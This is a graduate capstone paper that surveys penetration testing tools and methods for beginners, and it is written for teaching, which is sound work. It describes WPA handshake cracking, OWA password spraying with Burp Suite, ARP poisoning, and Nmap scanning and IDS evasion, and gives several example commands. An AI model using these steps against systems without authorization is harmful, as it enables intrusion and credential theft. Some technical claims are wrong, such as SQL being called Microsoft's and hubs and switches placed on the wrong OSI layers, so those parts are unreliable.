Penetration Testing Methodologies

by

Mathew Stuart

A Capstone Project Submitted to the Faculty of

Utica College

May 2020

in Partial Fulfillment of the Requirements for the Degree of

Master of Science in Cybersecurity

ii

© Copyright 2020 by Mathew Stuart

All Rights Reserved

iii

Abstract

Given the rising trend in security breaches among organization’s worldwide,

cybersecurity has increasingly become an important role in the public and private industry

sectors. In addition, the cybersecurity workforce gap has left many organizations without

qualified professionals to secure their data. There is a growing need to educate and employ

cybersecurity professionals in both commercial organizations and government.

The main barriers to beginning a career in cybersecurity are gaining advanced and

relevant knowledge and experience in cybersecurity. Knowledge can be difficult and time

consuming to obtain, and training can cost money. Because of the barriers to beginning a career

in cybersecurity, a single source of information that leads to knowledge and experience in

cybersecurity is valuable.

The purpose of this research was to develop a cybersecurity penetration testing

methodology template for use by aspiring cybersecurity professionals to practice penetration

testing and develop a personalized methodology. What are the common penetration testing tools

and methods for attacking a network or environment from the Internet? What are the common

penetration testing tools and methods for attacking a network or environment from the Intranet?

What are the common penetration testing tools and methods for attacking web applications? This

research is important because penetration testing experience leads to advanced knowledge in

cybersecurity, which is an advantage when beginning a career in cybersecurity. Understanding

cybersecurity concepts through a security analysis provides a tester with conceptual knowledge

and hands-on experience. Through the process of developing a penetration testing methodology,

an aspiring cybersecurity professional will learn about cybersecurity tools, technologies, and

procedures. Keywords: Duane Corbo, cybersecurity, cyber operations, penetration security, testing

iv

Acknowledgments

My first acknowledgment is to Professors Krystina Horvath and Anna Ragno for their

guidance and assistance throughout this project. Their feedback has been valuable and

educational throughout this project. I would also like to thank family, especially my wife and

mother, for all their support throughout these past 7 years as I worked and went to school at the

same time. If not for their support and encouragement, I may not have reached this point in my

education and career. I would also like to thank Utica College for providing the technical and

hands-on education that I was searching for. I learned a great deal from every course, and I was

able to utilize that knowledge to gain employment in the cybersecurity industry. Lastly, I would

like to thank Michael Denny for taking the time to lend his experience and expertise and be the

second reader of this paper.

v

Table of Contents

List of Illustrative Materials........................................................................................................... vi Statement of the Problem ................................................................................................................ 1 Literature Review............................................................................................................................ 7

Introduction to Penetration Testing ............................................................................................ 7 Intelligence Gathering ................................................................................................................. 8 Wireless Networks .................................................................................................................... 10 Web Application Testing .......................................................................................................... 14 Intranet ...................................................................................................................................... 18

Scanning and discovery ........................................................................................................ 18 Exploitation and gaining access ............................................................................................ 22 Persistence and spreading ..................................................................................................... 24

Data gathering and extraction ............................................................................................... 29

Covering tracks ..................................................................................................................... 31 Discussion of the Findings ............................................................................................................ 31

Wireless Tool Benefits .............................................................................................................. 32

Web Application Testing Results ............................................................................................. 32 Intranet Security Testing Results .............................................................................................. 35

Commonalities .......................................................................................................................... 43 Conclusion .................................................................................................................................... 45 References ..................................................................................................................................... 48

Appendix A ................................................................................................................................... 54

Appendix B ................................................................................................................................... 56

vi

List of Illustrative Materials

Figure 1. Nikto Options 1 ............................................................................................................. 56

Figure 2. Nikto Options 2 ............................................................................................................. 57

Figure 3. ARP Poisoning Before and After .................................................................................. 58

Figure 4. Enum4Linux Help Page Output .................................................................................... 59

Figure 5. Syntax for Metasaploit .................................................................................................. 60

Figure 6. Spear Phishing Model: Targeted Cyber Attack ............................................................. 61

Figure 7. Nikto Command and Output From a Generic Scan ...................................................... 33 Figure 8. ZAP Automated Scan Configuration Screen ................................................................ 34 Figure 9. ZAP Automated Scan Results ....................................................................................... 35 Figure 10. Nmap device enumeration command .......................................................................... 36

Figure 11. How to Start a Scan in OpenVAS ............................................................................... 37 Figure 12. Results From OpenVAS Scan ..................................................................................... 38 Figure 13 - Enum4linux LDAP Output ........................................................................................ 39

Figure 14. Enum4linux Users Output ........................................................................................... 40

Figure 15. Enum4linux Password Policy Output ......................................................................... 41 Table 1 - Example of Basic Nmap Command Options................................................................. 54 Table 2 - Nmap Stealth Scanning Options .................................................................................... 54

1

Statement of the Problem

The purpose of this research is to review different penetration testing methodologies and

discuss the advantages and disadvantages of each methodology in order provide a best practice

method for attacking networks. The networks and environments that will be explored are the

Intranet, Internet and web applications. This will focus on information at a beginner’s level, thus

creating a template that can be used as a baseline for creating a more advanced and personalized

methodology as a user’s skills and knowledge increase over time and through practice.

In order to provide best practices, the following questions will be answered; what are the

common penetration testing tools and methods for attacking a network or environment from the

Internet? What are the common penetration testing tools and methods for attacking a network or

environment from Intranet? What are the common penetration testing tools and methods for

attacking web applications?

In the realm of cybersecurity, there are two main roles; red team and blue team. Blue

teams are the teams of cybersecurity professionals who defend an environment from

compromise. In the event of a compromise, the blue team responds to those incidences for the

purposes of both minimizing the degree of compromise and gaining knowledge regarding the

attack. Blue teams also use data gathered about an attacker for investigations by either their

organization and/or law enforcement.

A red team is a team of cybersecurity professionals whose purpose is to attack an

organization’s environment for the purpose of authorized security testing, audit and analysis. Red

teams only perform offensive actions at the request of those who they are testing, therefore,

offensive testing is always agreed upon beforehand, with strict rules for the teams to follow.

2

These rules include a list of acceptable and unacceptable actions, and the scope in which the

attack will be conducted (NIST, 2019a).

A blue team member or member on the defensive side of cybersecurity needs to know

more than just how to utilize tools to defend a network. A well-rounded security professional

also needs to understand how to perform offensive operations. It is imperative that cybersecurity

professionals understand how an attacker can penetrate an environment, which will inform the

cybersecurity professional how to defend against these types of attacks (NIST, 2019b).

Penetration testing (Pen testing) can help test the blue team’s incident response skills and

methods. A penetration test also helps a blue team identify an organization’s vulnerabilities and

allows the blue team to make modifications to systems and processes. The process of penetration

testing also promotes a proactive approach to blue teaming. If a blue team knows that an

environment will be the target of a pen test, they are likely to perform their own ad-hoc

penetration test to identify and remediate vulnerabilities ahead of time. This is often the case

when penetration tests are required for regulation and compliance purposes (Sanabria, 2018).

According to the Offensive Security organization (2019), offense is the best defense. The

only way to be confident that risk mitigation strategies protecting a company against cyber-

attacks will be effective is through simulation, or pro-actively testing security measures before a

real intruder does. By encouraging students to put themselves in the shoes of a hacker by

utilizing the same tools and techniques, Offensive Security is leveling the playing field for

defenders (Offensive Security, 2019).

In order to secure an environment, it is critical that a cybersecurity professional

understand how a potential attacker would attempt to penetrate an organization’s environment.

The need for offensive security knowledge grows as the number of successful cyber-attacks

3

increase each year. The number of successful security breaches in the U.S. for 2016 was 1,091,

which was 40% more than the 780 breaches in 2015. Similarly, there were 1,579 data breaches in

the United States in 2017, which was a 44.7% increase from 2016 (Identity Theft Resource

Center, 2018).

The shock of data breach frequency is compounded by the average cost of a data breach

in the United States. IBM’s report on data breaches states that the average cost of a data breach

in the United States is $8.19 million per breach (IBM, 2019). With the risk of an organization

losing millions of dollars, and the possibility of millions more in lost revenue due to a damaged

reputation as the result of a data breach, organizations are on the lookout for qualified

cybersecurity professionals to protect their environments.

There is currently a severe shortage of qualified cybersecurity professionals worldwide.

A study conducted by Cybersecurity Ventures states “A 2016 skills gap analysis from ISACA

estimated a global shortage of 2 million cybersecurity professionals by 2019 (a half-million more

than Symantec’s prior estimate), according to the United Kingdom House of Lords Digital Skills

Committee” (Morgan, 2017). In the United States, there was a shortage of about 314,000

cybersecurity professionals as of January 2019 (Crumpler & Lewis, 2019). The data breach

frequency, costs to an organization per data breach, and the large cybersecurity professional’s

workforce gap all outline the need for more cybersecurity professionals. An increase in

cybersecurity professionals to fill the workforce gap will also increase the security posture of

organizations in the United States and around the world.

One of the questions regarding the cybersecurity professional’s workforce gap is why the

gap exists in the first place. The International Information Systems Security Certification

Consortium, also known as ISC2, performed a study in 2018 regarding the mentioned workforce

4

gap and it showed that “Despite [cybersecurity] professionals looking to shift priorities, as well

as other concerns and challenges, 68% of respondents say they are somewhat or very satisfied

with their jobs” (International Information Systems Security Certification Consortium, 2018).

With most cybersecurity professionals satisfied with their jobs, the question remains as to

why more people are not filling the workforce gap. The International Information Systems

Security Certification Consortium (ISC2) also investigated this issue. According to ISC2’s

survey, 34% of people surveyed do not know which career path opportunities lead to a role in

cybersecurity, 32% of organizations do not know about cybersecurity skills, and the same

percentage of people surveyed cannot afford certification training and/or the certifications

themselves. Twenty-eight percent of people surveyed cannot afford the formal education to

prepare them for a career in cybersecurity, and 26% of people surveyed said they do not have

enough experience in cybersecurity to get a job in the industry. This is a problem because 49% of

organizations surveyed in the same survey stated that the most important qualification for

employment is relevant cybersecurity work experience, while 40% of organizations stated that

extensive cybersecurity work experience is the most important qualification for employment

(International Information Systems Security Certification Consortium, 2018). It is difficult to

begin working in the cybersecurity industry if one does not have prior cybersecurity experience.

Between the time it takes to learn cybersecurity skills, the costs of training, and the

requirement for prior cybersecurity experience, it is not surprising that there is such a large

workforce gap. The lack of quality, open-source training materials that cover the steps needed to

learn cybersecurity, specifically offensive security, is the main issue. Offensive security is so

important because the previously mentioned ISC2 survey reported that 47% of organizations

named advanced cybersecurity concepts as the most important qualification for employment.

5

Another 40% believe relevant cybersecurity experience is the most important factor for

employment, meaning that 87% of organizations require prior experience for employment

(International Information Systems Security Certification Consortium, 2018).

Offensive security knowledge falls under advanced cybersecurity concepts and relevant

cybersecurity knowledge, making penetration testing and red team skills the most coveted skill

set. Gaining knowledge and experience in the cybersecurity field can occur at home during a

person’s spare time. There are ways of creating home cybersecurity testing labs that allow a

person to test and practice what they learn. In one example, a cybersecurity student, Vitaly Ford,

posted instructions on how to create such a lab environment using virtual machines. Ford’s blog

post also provides links to resources like virtual machine images that can easily be used with

virtual machine hosting software, also known as a hypervisor. An example of a hypervisor is

VirtualBox. Ford’s directions on first steps are to learn how to install a virtual machine (and a

hypervisor), which is typically performed in Microsoft Hyper-V, Oracle VirtualBox, or VMWare

Workstation/Fusion. In addition, one can begin thinking about developing a networking diagram

that will help a pen tester stay on track once the pen tester installs virtual machines and connects

them together (Ford, 2017).

Ford’s steps are one option, among several, to gain hand-on experience and cybersecurity

knowledge. Hands-on penetration testing experience is possible through the utilization of

penetration testing environments provided by the hosts of hackthebox.eu. If a user can gain

credentials and create an account in hackthebox.eu, that user is able to utilize the OpenVPN

config file for their Hack the Box account, which accesses a testing network. This would allow

the user to perform attacks against pre-setup machines in the environment and, thus, test what

was learned in regard to penetration testing. Hack the Box is a website that allows the user to test

6

their pen testing skills and share their knowledge and methods with the rest of the hacker

community (Hack the Box, 2019). The pre-setup machines in Hack the Box’s environment range

in difficulty gaining user and root credentials. Once a tester gains one or both credentials, they

submit the credentials to Hack the Box, who gives points for correct credentials. Practicing

penetration testing with the easier machines is often a good start and a great learning experience.

This paper addresses the lack of penetration testing methodology templates that

beginners in the field of cybersecurity should utilize to develop a personalized penetration testing

method that works best for them. There is a lack of cybersecurity learning materials available for

new professionals that overview how to use different tools and how to utilize tools at each step

of a penetration test. In search of advanced cybersecurity conceptual knowledge, the main

barriers to entering the cybersecurity field are time, money and a lack of cybersecurity

experience. A penetration testing template would assist an information technology professional

gain cybersecurity knowledge and experience.

For those with little to no cybersecurity experience, who wish to perform penetration

tests, tend to research multiple online sources in order to gain the knowledge they need. Instead,

there should be a single template for penetration testing best practices with tool syntax and

examples which provide a starting point for beginners to develop their own pen testing

methodology.

The primary audience who might benefit from this research are those who wish to gain

penetration testing knowledge and experience, and those who wish to learn how a pen test is

performed from beginning to end. It also includes steps on how to discover hosts, find

vulnerabilities, exploit example vulnerabilities, maintain persistence on a machine, exfiltrate data

and erase evidence of an attack to cover the attacker’s tracks. The mentioned penetration testing

7

steps include syntax for the tools covered in this paper, and best practices on how to use those

tools.

Literature Review

Introduction to Penetration Testing

There are three different types of penetration tests, black box, white box, and grey box.

The type of penetration test that is performed depends on the amount of information is provided

to the tester before testing begins. Black Box testing is conducted when the tester is given no

information about an organization’s network or code. White Box testing is when the tester is

given full knowledge of an organization’s network or source code. Grey Box testing is a

combination of White and Black Box testing, meaning that the tester has a limited knowledge of

the network or source code (Khan & Khan, 2012). The seven main phases of a penetration test

are as follows:

• Discovery

• Enumeration/Info Gathering

• Exploitation

• Privilege escalation

• Persistence/Maintaining Access

• Covering Tracks

• Documentation/Reporting

(Ali, Allen, & Heriyanto, 2014).

In the book Advanced Penetration Testing for Highly-Secured Environments (2016), the

authors explain the Penetration Testing Execution Standard (PTES) and outline the standard’s

structure. The seven sections of the PTES are pre-engagement interactions, intelligence

8

gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

The PTES explanation does not include a technical guide for the standard, but it does reference

the URL http://www.pen test-standard.org/index.php/PTES_Technical_Guidelines, which is a

technical guide for the PTES. In the PTES technical guideline, the steps are broken down into

smaller steps with technical information, but the core of the guideline is the same as the

guideline found in Advanced Penetration Testing for Highly-Secured Environments (2016)

(Allen & Cardwell, 2016).

Standards in penetration testing are often vague, general and procedural in nature, as

opposed to being technical, which provides specific details. A commonality throughout

penetration testing is the use of tools and toolsets to perform those tests. Open-source tools are

most often used to perform penetration tests. Penetration testers use stand-alone tools and

toolsets. These toolsets are chosen by their effectiveness and the tester’s familiarity with the tool.

If the tester is not familiar with their tools, the test will not be effective. There are many open-

source and paid tools, but testers need to choose their toolsets to fit the needs of the test. As an

example, in an application security test, Aircrack-ng would not normally be necessary because

Aircrack-ng was made for wireless network testing and the test is performed on a software’s

security and not the security of the network. The same could be said if the situation was reversed

where a static code analyzer would not be required for a network penetration test. Ensuring the

toolset matches the test and the penetration tester is familiar with their toolset is easily the most

important aspect of a penetration test (Velu, 2017, pp. 201-206).

Intelligence Gathering

The discovery phase begins with intelligence gathering and the discovery of devices that

could be compromised. The three intelligence gathering methodologies are open source

9

intelligence (OSINT), cyber intelligence (CYBINT) and human intelligence (HUMINT). Cyber

intelligence involves finding information about the target on the Internet, which is a subset of

open source intelligence. This means finding intelligence via an open source tool or platform.

Another intelligence gathering location is online social networks (OSNs). OSNs are part of

CYBINT, and for good reason as OSNs commonly have a wealth of data on individuals within a

company and on the organization itself (Sood & Enbody, 2014).

Human intelligence occurs when an attacker acquires information about the target by

analyzing responses from people through direct interaction. This can include phishing emails or

physically posing as someone else to trick the target into providing the attacker information.

These practices are also known as social engineering (Sood & Enbody, 2014). Social media has

changed open source intelligence in a profound way. Through OSN, intelligence on both

individuals and organizations is discoverable through social media accounts such as Facebook,

YouTube, Instagram, Snapchat, and Twitter. When reviewing the target’s social media posts, it is

possible to gather the target’s location during certain times of day, friend lists, liked pages, and

group associations. The information gathered using OSN provides the attacker with an overview

of what the target likes and what kind of information they are most receptive to. This can give an

attacker the information needed to manipulate a user through social engineering as part of an

attack against the specific user or an organization (Bahybars-Hawks, 2015).

OSINT also includes discovering publicly facing devices of a target organization. This

could include website, Internet accessible servers and/or Internet accessible networking

equipment. Target discovery phase mostly entails identifying the status of a target’s network,

operating system (OS), and mapping out the organization’s information technology

infrastructure. This provides the penetration tester with a better understanding of the

10

technologies or devices used within an organization and may further help the tester in

enumerating services. By utilizing tools in Kali Linux, the tester can determine what hosts are

live on a network, which operating systems are running on the local hosts, and will be able to

characterize each device according to its role. The tools in Kali Linux often utilize active and

passive detection techniques in addition to network protocols where they can be manipulated in

various ways to gather information from the OS and running services (Ali, Allen, & Heriyanto,

2014).

Wireless Networks

When a penetration test involves compromising a wireless network, it can end up being

the key to compromising an entire company. Some tools and toolsets in Kali Linux are useful

when attempting to test a wireless network’s security. Two of the most widely used toolsets are

Kismet and Aircrack-ng.

Kismet can be used as a wireless detector, sniffer, and intrusion detection system. Kismet

can detect and sniff the name of the wireless network along with its broadcast ID (BSSID), the

channel it is broadcasting on, the MAC address of the wireless access point (WAP), and the

MAC address clients use to connect to the wireless network. Kismet supports some plugins that

expand the wireless protocols that can be sniffed (Beggs, 2017). It can also sniff the other

Institute of Electrical and Electronics Engineers (IEEE) Wi-Fi standards 802.11a, 802.11b,

802.11g, and 802.11n traffic. These different IEEE 802.11 standards are wireless local area

network (WLAN) standards that, among other features, denotes the speed and security of

wireless traffic. The latest IEEE standard for wireless networks is 802.11ay, which allows a

possible 20 gigabits per second download and upload speed (IEEE, 2019).

11

Kismet performs reconnaissance by placing the attacker’s wireless network interface card

(WNIC) in promiscuous mode and activating Kismet, which will capture packets transmitted

over the air and discover the different SSIDs in the area, along with cell towers for mobile data

traveling through the air. The information gathered by Kismet is useful in different ways. For

example, knowing the wireless security protocol will allow the attacker to determine the

appropriate decryption module in Aircrack-ng to extract authentication information. Knowing

the MAC address allows the attacker to attempt to perform different types of attacks. For

example, a tester can perform an Omerta attack if the wireless access point (WAP) is an

unpatched Aruba WAP. Kismet obtains a variety of information when sniffing the 802.11

standard spectrum (Beggs, 2017). “Omerta is an 802.11 DoS tool that sends disassociation

frames to all stations on a channel in response to data frames. The Omerta attack is characterized

by disassociation frames with a reason code of 0x01” (Aruba Networks, 2019).

Another well-known open-source wireless security tool is Aircrack-ng. The toolset

specializes in wireless security testing and is comprised of an array of tools that can perform

most any task required during a wireless security penetration test. The following is a list of each

tool in the Aircrack-ng tool suite and their uses:

• Airbase-ng – used for rogue access point creation

• Aircrack-ng – a cracking and recovery tool for WEP and WPA/WPA2 keys.

• Airdecap-ng – decryption for WEP and WPA/WPA2 wireless traffic.

• Airdecloak-ng - Used for bypassing WEP cloaking which is a WEP method for

fooling WEP cracking tools.

• Aireplay-ng – Creates wireless traffic for attacks.

• Airmon-ng – places the WNIC into promiscuous mode to view all traffic

12

• Airodump-ng: Used for 802.11 protocol monitoring and sniffing.

• Airodump-ng-oui-update: Updates the Organizationally Unique Identifier (OUI)

database.

• Airolib-ng – Maintains a local database of ESSIDs, passphrases and precomputed

PMKs to use in cracking

• Airserv-ng – Sets up a local server to allow other devices to access the wireless

network

• Airtun-ng – Creates virtual tunnel interfaces.

• Besside-ng – An automated WEP and WPA attacking tool for cracking all WEP-

protected networks that the WNIC can see. It also records all the WPA-

handshakes.

• Easside-ng – Sets up communication via a virtual WEP-protected AP without a

WEP-key.

• Packetforge-ng – Can create fake wireless network packets for other attacks.

• Tkiptun-ng – Can inject a few frames into a WPA TKIP network with quality of

service (QoS)

(Fadyushin & Popov, 2016, pp. 154-159).

Penetration testers can crack a Wi-Fi protected access 2 (WPA2) key using Airmon-ng to

place the interface into promiscuous mode so that the interface can view all packets traveling

through the air. The next step is to use Airodump-ng to take that captured data and “dump” it

into a table. The Airplay-ng tool forces de-authentication of a wireless client, which forces the

target to re-authenticate to the WAP. This allows Airodump-ng to capture the WPA handshake

13

as it travels over the air. Aircrack-ng decrypts and recovers the key, which authenticates the

tester to the wireless network (Fadyushin & Popov, 2016).

Decryption is part of most penetration testing processes. Wireless network handshakes

are one example, and captured passwords from compromised machines are another example

where decryption is necessary. In the password cracking section of the PTES, it mentions how to

crack passwords for different wireless security protocols. WPA-PSK can be used to brute-force

the password to the SSID. WPA is an acronym for Wi-Fi Protected Access and PSK stands for

Pre-Shared Key. In order to accomplish a successful decryption is to use a tool, such as

Wireshark or Airodump-ng, the authentication handshake between a client and the WAP must be

captured. The next step is to decrypt the authentication handshake, which reveals the password.

The Penetration Testing Standard mentions that the Aircrack-ng tool suite is made specifically

for this type of task and is a standard in open source tools for cracking wireless authentication

encryption (Pen test-Standard, 2012).

Regarding password cracking, John the Ripper (JTR) is an open source tool that cracks

hashes to reveal passwords. JTR specializes in NTLM hashes but can be used for Kerberos and

other operating system hashed passwords such as Linux and Macintosh devices depending on the

version of JTR that is running. This tool can be used to decrypt WEP and WPA/WPA2

authentication that was captured over the air during a packet sniff. Hashes are cracked using

rainbow tables, which are hashed wordlists, which are then hashed several more times using

sophisticated mathematical methods. JTR uses rainbow tables to crack the captured hashes

(Fadyushin & Popov, 2016).

As mentioned previously, another way to attack a wireless network is to pose as the

wireless network itself. This is accomplished by performing a modified combination of a man-

14

in-the-middle and phishing attack called AP Phishing. AP phishing, or access point phishing, is

an attack that involves a rouge access point that contains a web portal, which asks users for

sensitive information. If performed correctly, the users will not realize they are being phished.

This is assuming they normally enter credentials in a web portal to access the network. This

works best when spoofing access points in public areas such as Starbucks. Airpwn-ng, which is

part of the Aircrack-ng tool suite, can perform this attack (Fadyushin & Popov, 2016).

Web Application Testing

Referring to the Open Web Application Security Project (OWASP), the OWASP

penetration testing methodologies page of their website list reasons for performing web

application penetration tests and references the Penetration Testing Execution Standard (PTES).

OWASP also refers to the payment card industry data security standard PCI-DSS compliance

requirement for penetration testing and offers some guidance on the framework for compliance

testing. There is also a page that outlines the framework for NIST800-115’s Information Systems

Security Assessment Framework (ISSAF). Other methodologies outlined are the Open Source

Security Testing Methodology Manual (OSSTMM) and the FedRAMP Penetration Test

Guidance. This is important for web application penetration testing, as there is always a reason

for a test. Regulatory compliance can often be that reason. Understanding the web application

penetration testing compliance standards is critical to performing the correct test for the

organization (OWASP, 2019).

The Zed Attack Proxy (ZAP) was developed by the OWASP as an open-source tool for

the sole purpose of finding web application vulnerabilities. The tool has a variety of functions

allowing automatic and manual scanning of an application. The OWASP ZAP user guide on

Github contains an explanation for the different settings that the ZAP tool offers (Psiinon, 2015).

15

ZAP has multiple scan modes that can be utilized to serve different functions. As an

example, safe mode is a setting that tells the tool to refrain from any dangerous scan actions that

could hinder the performance of a web application. Protected mode is the next level up from safe

mode and allows the scan to perform only potentially dangerous scan actions against the URL in

scope. Standard mode is the default mode when a tester installs and opens the tool, and allows

the security tester to perform whichever tests they want. Lastly, attack mode tells the tool to scan

the URL once discovered and runs all tests and attacks available against the in-scope URLs

(Psiinon, 2015).

There are several other tools available to assist a security analyst throughout the process

of performing a web application penetration test. One such tool is Nikto, which is an open source

web application scanner that looks for URL paths, index pages, HTTP server options, server OS

and web hosting software. Because the program looks at URL paths and index pages, not all the

information gathered are vulnerabilities. The tool also lacks stealth, so it could also be used to

test intrusion detection systems (IDS) and/or intrusion prevention systems (IPS). In Kali Linux,

the command ‘nikto -Help’ shows a list of options for scanning, format, display, configuration,

authentication, and other features that can be found in Figures 1 and 2. Figures 1 and 2 are in

Appendix B (Sullo, 2019).

A popular, effective and widely used web application security testing tool is Burp Suite,

which is a web application protocol analyzer that allows a user to intercept http and https traffic.

The tool allows for security testing by manipulating those captured packets, which contain

information about the web application. Intercepting traffic is performed by using the Burp Suite

software as a proxy for the attacker’s browser and then activating Burp Suite’s intercept mode so

16

that each http/s packet is displayed in HTML code and is intercepted before it gets to the browser

and again before it gets to the website (Sharma, 2017).

One use case for Burp Suite during security testing is using the captured data for a

successful and failed login POST request and using those results in conjunction with the Hydra

tool that is used for credential testing. A POST request is sent to the web application when a user

inputs information on the website and attempts to submit that information. An example of this

would be clicking login after entering a username and password into a website. The process is to

take the HTML code from Burp Suite, use it in Hydra while utilizing a username file and

password file to test credentials and check if a username and password set is successful in

authenticating. This is a faster method than manually testing usernames and passwords in the

browser (Sharma, 2017).

An outlook web application (OWA) is a popular spot to perform password spaying

attacks as OWA is often linked to a user’s domain credentials. One of the issues in performing

password spraying is password lockouts, which occurs when a password has been entered

incorrectly too many times and the account is locked-out. The attacker can no longer try different

passwords indefinitely. A workaround for account lockout limitations is to use one strategically

chosen password across all the accounts of an organization’s domain, thus allowing more

password attempts before locking out the account (Najera-Gutierrez & Ansari, 2018).

Before performing the password spray, it is important to obtain the username format or

email address format of the organization, which is usually performed during OSINT and

HUMINT. When choosing the right password for a password spray against an OWA account, it

is important for the tester to understand and know common passwords. An example of a

commonly used password is the current season and the year, such as Winter2019 (Najera-

17

Gutierrez & Ansari, 2018). The ten-character password has uppercase, lowercase and numbers.

Most organizations only require the password to be eight characters.

In order to perform the attack, the attacker needs to visit the OWA login page to attempt

and fail a login while capturing the POST request. The captured request is then forwarded to

Burp Suite’s Intruder functionality where the attacker uses the attack type of ‘sniper’ and

specifies the type of payload they want to use. The payload is the username or email because that

is the only thing that will change during the attack since the same password will be used against

all accounts to reduce the risk of account lockouts (Najera-Gutierrez & Ansari, 2018).

Once a password is input, the attacker must import the list of possible usernames or email

addresses that were found and/or generated during OSINT and HUMINT. Once these steps are

complete, it is time to launch the attack. In some circumstances, the tester must set Burp Suite to

follow URL redirects and process those URL cookies for the attack to be successful. Once the

settings and configurations are set, a successful attack can be launched. URL cookies are saved

on a user’s browser and contain information regarding the session ID, user ID and other text.

Websites use cookies to maintain a session with a browser so that the user doesn’t have to re-

authenticate as other URLs are loaded (Najera-Gutierrez & Ansari, 2018).

Databases use Microsoft’s Structured Query Language (SQL) in support of web

applications. SQL is a programming language used for database communication and queries.

Because web applications use SQL, the SQLMap tool is included in Kali Linux OS distribution

by default and is a popular tool for testing the SQL security in web applications. SQLMap

supports several versions of SQL and supports enumeration, fingerprinting, and takeover options

when vulnerabilities allow. The specifics regarding what tasks the tool can perform are listed on

its official GitHub. The range of options and capabilities that the tool offers makes it a great tool

18

to use during web application security testing and should be included in any penetration tester’s

tool suite (Stamparm, 2014).

Intranet

Scanning and discovery. The Internet and Intranet are two different types of networks.

The Internet is a computer communications network that connects servers and computers around

the world (Merriam-Webster, 2019). An Intranet connects computers and servers within one or

several local area networks (LANs) not accessible to the Internet without the use of an Internet

connection through an Internet Service Provider (ISP).

When a tester has access to a target organization’s Intranet, they generally can establish a

network connection to other network connected devices on that organization’s Intranet. Access

to an organization’s Intranet can occur in a couple of different ways. One way to get a network

connection is to establish a physical connection to the network using an ethernet cable to an

ethernet port in the office of the organization. Another way is to get wireless network access

through a connection to the wireless access point (Fadyushin & Popov, 2016).

Once the tester is on the network, discovery of devices on the network and enumeration

of those devices are the next steps in performing a penetration test. Reconnaissance, which is

part of the preparation phase where the tester gathers as much information as possible about the

target before launching an attack. During the reconnaissance phase, the tester will utilize

different intelligence to gain more knowledge about the target organization. The phase may also

involve internal and/or external network scanning (EC-Council Press, 2017).

When a tester needs to perform discovery scanning and enumeration on a network, Nmap

is the tool of choice. There are little to no open-source tools that match the capabilities that

Nmap provides. An example of an Nmap command is; nmap -A -v -O -sC 192.168.0.16 -oG

19

scan.txt. The nmap portion of the command at the beginning initiates the Nmap program. The

options, such as -A, -v, -O, and -sC tell Nmap what actions to perform against the IP address or

network range. The -oG option is the output where the ‘o’ stands for output and the ‘G’ stands

for grep, which places the output in a greppable format, allowing the use of grep to search for

keywords within a file. The last portion of the output is scan.txt, which creates the text file with

that name where the output is going to go to (Lyon, 2008). Table 1, Found in Appendix A, shows

an example list of some basic Nmap options.

The mentioned examples only show syntax but not all the ways that the Nmap tool can be

used. There are examples out there that show the tool’s true diversity in a variety of scenarios.

Depending on what the tester is trying to achieve, there are multiple ways to run Nmap. To

perform a basic ping scan of a network or range of IP addresses, the following command can be

utilized; nmap -sP -n 10.0.0.1-254 (Lyon, 2008).

The -sP portion of the command asks Nmap to ping the IP addresses to determine if the

devices are online, and the -n tells Nmap not to attempt domain name resolution. With the small

amount of data that Nmap is required to gather during this scan, the scan will be faster. To gather

a little more data, a tester can replace -sP with -sT which will tell Nmap to scan the common

TCP ports on the devices. This is where port scanning comes into play (Lyon, 2008).

Port scanning is critical after initial discovery has been completed. As an example, if a

ping scan was performed and only one IP address was found to be online, the next step is to

perform enumeration of that device. To determine which ports are open, the -p option is used. If

the tester wants to scan the entire range of ports on the device, the option is -p-. Once the tester

knows which ports are open, they can Nmap with the -sV option which tells Nmap to determine

the version of the services running on those ports. Depending on the version of the running

20

services, there could be known exploitable vulnerabilities. The difficulty with Intranet scanning

is the risk of getting caught by IDS and IPS. One basic method to avoid detection is address

resolution protocol (ARP) scanning which asks the switch for the ARP table, identifying devices

on the local area network while never reaching out to those devices directly. The Nmap option

for performing an ARP scan is -PR. There are multiple ways of performing these steps in Nmap,

and there are more Nmap options available to assist in discovery and enumeration while

remaining stealthy (Lyon, 2008).

In order to avoid detection of IDS and IPS on an Intranet, an attacker needs to blend-in

with normal traffic. When scanning a network, it is important to limit the frequency of packets

sent from the tester’s computer so the scan looks more like normal traffic rather than a scan of

the network (Allen & Cardwell, 2016). Nmap can limit packet parameters, spoofing source IP

address, spoofing MAC address, and changing other packet parameters. Using a combination of

the Nmap options in Table 2, found in Appendix A, will assist in stealth scanning (Beggs, 2017).

Depending on the situation, poisoning the ARP table is a viable option to perform certain

attacks that give the penetration tester information that can be utilized to compromise a system or

network. The tool, Cain and Abel, can perform ARP poisoning after the pen tester has placed

their NIC or WNIC in promiscuous mode and obtained a list of the devices from sniffing all the

traffic on the network. After obtaining the list of devices, the tester can then determine which

host they want to impersonate and is able to filter the sniffing tool to show only that device’s

traffic. The Cain and Abel tool performs a man-in-the-middle attack by sending the victim

machine an ARP request with the IP address of the default gateway, and then an ARP request to

the default gateway with the IP address of the victim machine. At this point, the victim machine

thinks the pen tester is the default gateway and the default gateway thinks the penetration tester

21

is the victim machine. Cain and Abel will capture the packets and analyze the packets for

credentials, PII, and other sensitive information can begin (Sanders, 2017). Figure 3, found in

Appendix B, shows a graphical representation of an ARP table before and after ARP poisoning.

Another popular packet sniffing tool is Wireshark. When trying to sniff a network, it is

best to be on a hub network instead of a switched network because a hub operates on the second

layer of the OSI model. In turn, it will broadcast all packets through all ports all the time, which

makes sniffing a network much easier. A switch operates on the third layer of the OSI model and

will only send packets out of the ports based on the IP and MAC addresses in the ARP table.

Poisoning the ARP table by initiating a separate independent network connection and spoofing

the MAC of the default gateway to the switch will allow a penetration tester to imitate a hub

network by forcing all the other devices on the LAN to go through the tester’s computer in order

to leave the LAN. When this happens, Wireshark can act as a proxy by routing packets to and

from the rest of the Intranet and the victim machines. As Wireshark routes packets, it is also

capturing those packets. Just like Cain and Abel, Wireshark can analyze the packets offline for

credentials, keys, and any other sensitive information (Ali, Allen, & Heriyanto, 2014).

Network scanning and device enumeration is key during the early stages of a penetration

test and security analysis. When the network has been scanned and devices have been

footprinted, vulnerability scanning is an appropriate next step, and there are tools to assist a

tester during this stage. The OpenVAS tool is a collection of security tools that perform

vulnerability management functions. It was developed for a client-server architecture, where the

clients request vulnerability scans from the server that performs the scans. Because OpenVAS is

modular, multiple scans can run simultaneously (Ali, Allen, & Heriyanto, 2014).

22

During preparation for an attack, reconnaissance is required to learn about the targets.

The discovery and enumeration phases draw on competing intelligence and involves

unauthorized internal and external scanning.

